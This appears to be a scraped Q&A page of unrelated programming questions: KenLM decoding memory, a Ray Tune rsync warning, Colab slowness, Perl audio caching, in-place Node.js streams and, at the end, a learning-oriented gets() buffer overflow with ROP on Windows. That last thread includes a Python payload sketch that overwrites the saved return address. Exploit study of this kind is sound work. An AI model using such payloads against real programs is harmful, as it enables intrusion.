Problem with CTCBeamDecoder.decode() when using a big (.arpa / .binary) file - pytorch

The repo I'm using: https://github.com/parlance/ctcdecode
I'm interested in using a KenLM language model to decode/score the outputs of my speech recognition model.
When I initialize my CTCBeamDecoder with model_path='./test.arpa', a small .arpa file (~4 KB) used just for testing, I hit no problems and CTCBeamDecoder.decode() produces output without any issue.
But when I use the actual .arpa file for my project (3-gram.pruned.1e-7.arpa.gz, ~90 MB), it either crashes instantly or runs forever without producing anything. I also built a .binary file from this .arpa file, but I run into the same problem with it.
I should also note that when I load the bigger file, 3-gram.pruned.1e-7.arpa, with KenLM alone (without the CTC decoder), it loads without any problems and I can use it to score sentences; it is only loading the .arpa file through CTCBeamDecoder to decode my SR model's output that fails.
Is it simply that inference with a big .arpa file requires a lot of RAM? (I have 8 GB.)
If so, roughly how much RAM would I need to run inference with a file of this size?
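For reference, a minimal setup following the parlance/ctcdecode README looks roughly like the sketch below; the label set and the alpha/beta values are placeholders, not the real model configuration.
# Minimal sketch following the parlance/ctcdecode README; the label set and
# the alpha/beta values are placeholders, not the real model configuration.
import torch
from ctcdecode import CTCBeamDecoder

labels = ["_", " ", "a", "b", "c"]  # hypothetical label set, blank symbol first

decoder = CTCBeamDecoder(
    labels,
    model_path="./3-gram.pruned.1e-7.binary",  # KenLM binary built from the .arpa
    alpha=0.5,   # LM weight (placeholder)
    beta=1.0,    # word insertion bonus (placeholder)
    beam_width=100,
    num_processes=4,
    blank_id=0,
    log_probs_input=False,
)

probs = torch.rand(1, 50, len(labels)).softmax(dim=2)  # stand-in for network output
beam_results, beam_scores, timesteps, out_lens = decoder.decode(probs)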

Related

Tune hyperparameters in sklearn with Ray

I wonder why this appears every time I try to tune sklearn hyperparameters with TuneSearchCV, but I could not find any information about it:
Note that the important part is the log sync warning and, as a result, that logging in combination with TensorFlow and a search_optimization backend such as optuna does not work:
Backend is sklearn
Concatenating h5 datasets of the following files:
('output/example_train_1.h5', 'output/example_train_2.h5')
based on the following keys:
('x', 'y')
Concatenation successful, resulting shapes for the given dsets:
Key: x, shape: (20000, 25)
Key: y, shape: (20000,)
Log sync requires rsync to be installed.
Process finished with exit code 0
The tuning process seems to work as long as I do not use a search_optimization backend such as optuna.
I run this inside a Docker container. I went through the Ray documentation and could find the place in the source where I think the warning is raised. However, I could not find any setting or additional option to prevent it.
Furthermore, it seems that rsync is only necessary when using a cluster, which I am not actually doing right now.
The warning (Log sync requires rsync to be installed.) does not stop the script from executing. If rsync is not installed, it will just not synchronize logs between nodes, which seems to be unnecessary in your case anyway. You shouldn't run into any problem there.
It's hard to say what the problem is here, as we're missing crucial information: which version of Ray are you running, which version of tune-sklearn, and what does your training script look like?
If you're running into problems and you suspect it is a bug, please consider opening an issue in the tune-sklearn repository, and make sure to include the above information and preferably a minimal reproducible script so the maintainers can look into this.
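For what it's worth, a minimal reproducible script for this kind of setup could look roughly like the sketch below; the estimator, parameter values and trial count are invented for illustration, and the version prints cover the information asked for above.
# Hypothetical minimal repro; the estimator, parameter grid and n_trials are
# invented for illustration and are not from the original training script.
import ray
import sklearn
from sklearn.datasets import make_classification
from sklearn.linear_model import SGDClassifier
from tune_sklearn import TuneSearchCV

print("ray:", ray.__version__, "sklearn:", sklearn.__version__)
# tune-sklearn version: check with `pip show tune-sklearn`

X, y = make_classification(n_samples=1000, n_features=25, random_state=0)
search = TuneSearchCV(
    SGDClassifier(),
    param_distributions={"alpha": [1e-4, 1e-3, 1e-2]},
    search_optimization="optuna",
    n_trials=3,
)
search.fit(X, y)
print(search.best_params_)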

Running a Python script in Colab is very slow compared to running the same code directly in a Colab notebook

Recently I was trying to test a model I had already trained. Initially I wrote the code in a Google Colab notebook because of its interactive features; once I had finished the code and was getting satisfactory results, it took around 2.5 hours to produce the final output. After that I transferred the notebook code to a .py script with a few small modifications, saved it in Google Drive, and ran it with the command !python test.py. Now it takes more than 4.5 hours to get the final output. Can anyone explain why Colab takes so much longer when running the Python script from Google Drive compared to the same code in the notebook?
I would add a time measurement to every step I suspect of being slow and see which step in the whole program takes the time.
import time

a1 = time.time()
# your code step
print(time.time() - a1)
This will give you the time for each step and you can see which one is taking a long time.
Operations to check:
1. Object creation in loops
2. Read/write operations to Google Drive
Once you find the problem-causing piece of code, you may change it.
It may well be because Colab is retrieving the data from Google Drive and then possibly writing back to Google Drive again, which will of course take time, I guess.
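If Drive I/O turns out to be the slow part, a common workaround is to copy the inputs to the Colab VM's local disk once, work there, and copy the results back at the end. A rough sketch (all paths are placeholders):
# Rough sketch, all paths are placeholders: pay the Drive transfer cost once
# instead of on every read/write inside the loop.
import shutil

drive_input = "/content/drive/MyDrive/data/input.h5"
local_input = "/content/input.h5"

shutil.copy(drive_input, local_input)              # one slow copy from Drive
# ... run the test script against local_input (fast local disk) ...
shutil.copy("/content/results.csv",                # one copy back at the end
            "/content/drive/MyDrive/data/results.csv")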

How to cache files with Perl while playing sound files using vlc?

I would like to manually cache files in Perl, so when playing a sound there is little to no delay.
I wrote a program in Perl, which plays an audio file by doing a system call to VLC. When executing it, I noticed a delay before the audio started playing. The delay is usually between about 1.0 and 1.5 seconds. However, when I create a loop which does the same VLC call multiple times in a row, the delay is only about 0.2 - 0.3 seconds. I assume this is because the sound file was cached by Linux. I found Cache::Cache on CPAN, but I don't understand how it works. I'm interested in a solution without using a module. If that's not possible, I'd like to know how to use Cache::Cache properly.
(I know it's a bad idea to use a system call to VLC regarding execution speed)
use Time::HiRes;
use warnings;
use strict;

while (1) {
    my $start = Time::HiRes::time();
    system('vlc -Irc ./media/audio/noise.wav vlc://quit');
    my $end = Time::HiRes::time();
    my $duration = $end - $start;
    print "duration = $duration\n";
    <STDIN>;
}
It's not as easy as just "caching" a file in Perl.
VLC, or whatever program you use, needs to interpret the content of the data (in your case the .wav file).
Either you stick with calling an external program and just give it a file to play, or you need to implement the whole stack in Perl (and probably Perl XS modules). By the whole stack I mean:
1. Keeping the data (your .wav file) in memory (inside the Perl runtime).
2. Interpreting the data inside Perl.
The second part is where it gets tricky: you would probably need to write a lot of code and/or use third-party modules to get where you want.
So if you just want to make it work fast, stick with system calls. You could also look into Nama, which might give you what you need.
From your question it looks like you are mostly interested in getting the runtime of a .wav file. If it's just about getting information about the file and not about playing the sound, then Audio::Wav might be the module for you.
Caching internal to Perl does not help you here.
Prime the Linux file cache by reading the file once, for example at program initialisation time. It might happen that at the time you want to play it, it has already been made stale and removed from the cache, so if you want to guarantee low access time, then put the files on a RAM disk instead.
Find and use a different media player with a lower footprint that does not load dozens of libraries in order to reduce start-up time. Try paplay from package pulseaudio-utils, or gst123, or mpg123 with mpg123-pulse.

Node.js read and write stream to the same file at the same time

TL;DR
I'm browsing through a number of solutions on npm and github looking for something that would allow me to read and write to the same file in two different places at the same time. So far I'm having trouble actually finding anything like this. Is there a module of some sort that will allow that?
Background
In essence my requirement is that in a large file I need to, in the following order:
read
transform
write
Ideally the usage would be something like:
const fd = fs.openSync(file, "r+");
const read = createReadStreamSomehowFrom(fd);
const write = createWriteStreamSomehowFrom(fd);
read
  .pipe(new Transform({ transform(chunk, encoding, callback) { /* ... */ } }))
  .pipe(write);
I could do that with the standard fs.create[Read/Write]Stream, but there's no way to control the flow of both streams, and if my write position goes beyond the read position then I'm reading something I just wrote...
The use case is the same as perl -p -i -e: read and write to the same file (meaning the same inode) asynchronously and replace the contents without loading everything into memory.
I would expect this to be a real-world use case, yet all the implementations I found actually load the whole file into memory and then save it. Am I missing a known module here, or does something like this actually need to be written?
Hmm... a tough one it seems. :)
So, for the record: I found no such module and actually discussed this with some people responsible for a nice in-file replacing module. Seeing no other way to solve this, I decided to write it from scratch, and here it is:
signicode/rw-stream repo on github
rw-stream at npm
The module works on a simple principle: no byte can be written until it has been consumed by the readable stream. It's fairly simple underneath (a couple of fs.read/write ops while keeping an eye on the read and write positions).
If you find this useful then I'm happy. :)
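For illustration only, the position-tracking idea behind the module (never let the write offset pass the read offset on the same file) can be sketched like this in Python; this is not the module's actual code.
# Illustration of the read-before-write principle, not the rw-stream code.
# Needs os.pread/os.pwrite (POSIX); this simplified version assumes the
# transform never returns more bytes than it consumed - a real implementation
# would have to buffer or pause the write side in that case.
import os

def rewrite_in_place(path, transform, chunk_size=64 * 1024):
    fd = os.open(path, os.O_RDWR)
    read_pos = 0   # how far the file has been consumed
    write_pos = 0  # how far it has been overwritten; must never pass read_pos
    try:
        while True:
            chunk = os.pread(fd, chunk_size, read_pos)
            if not chunk:
                break
            read_pos += len(chunk)
            out = transform(chunk)
            assert write_pos + len(out) <= read_pos, "write would overtake read"
            os.pwrite(fd, out, write_pos)
            write_pos += len(out)
        os.ftruncate(fd, write_pos)  # drop the leftover tail if the output shrank
    finally:
        os.close(fd)

# e.g. rewrite_in_place("big.txt", lambda b: b.lower())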

Windows console application with gets() ROP exploit

I'm trying (for learning purposes) to exploit a gets() vulnerability using the return-oriented programming (ROP) technique. The target program is a Windows console application that at some point asks for input and then uses gets() to store the input in a local 80-character array.
I created a file that contains 80 'a' characters at the beginning + some extra characters + the address 0x5da06c48 to overwrite the saved EIP.
I open the file in a text editor and copy-paste the content into the console as input. I used IDA Pro (or OllyDbg) to set a breakpoint right after the return from gets() and noticed that the address was corrupted - it was set to 0x3fa03f48 (two 3f substitutions).
I've tried other addresses as well - some of them work fine, but most of the time the address gets corrupted (sometimes characters are missing or substituted, sometimes the input is truncated).
How to get over this problem? Any suggestion will be highly appreciated!
Copy-pasting binary data is hit-and-miss. Have you tried feeding the input into your test program directly from the file using input redirection?
First of all, keep track of the endianness of your platform. If you think your bytes are in the right order but you are still getting malformed input, it might be that your shell/text editor isn't binary-safe. You are better off writing an exploit for this flaw in a scripting language such as Python, using the subprocess library, which allows you to write data directly to an arbitrary process's stdin pipe.
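A sketch along those lines might look like this; the executable name and the four bytes of padding before the saved EIP are placeholders, and only the return address comes from the question.
# Hypothetical sketch: the executable name and the 4-byte padding before the
# saved EIP are placeholders; only the return address comes from the question.
import struct
import subprocess

RET_ADDR = 0x5DA06C48

payload  = b"a" * 80                    # fill the 80-character buffer
payload += b"BBBB"                      # placeholder padding up to the saved EIP
payload += struct.pack("<I", RET_ADDR)  # little-endian address overwriting EIP
payload += b"\n"                        # gets() reads up to the newline

proc = subprocess.Popen(["target.exe"], stdin=subprocess.PIPE)
proc.communicate(payload)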
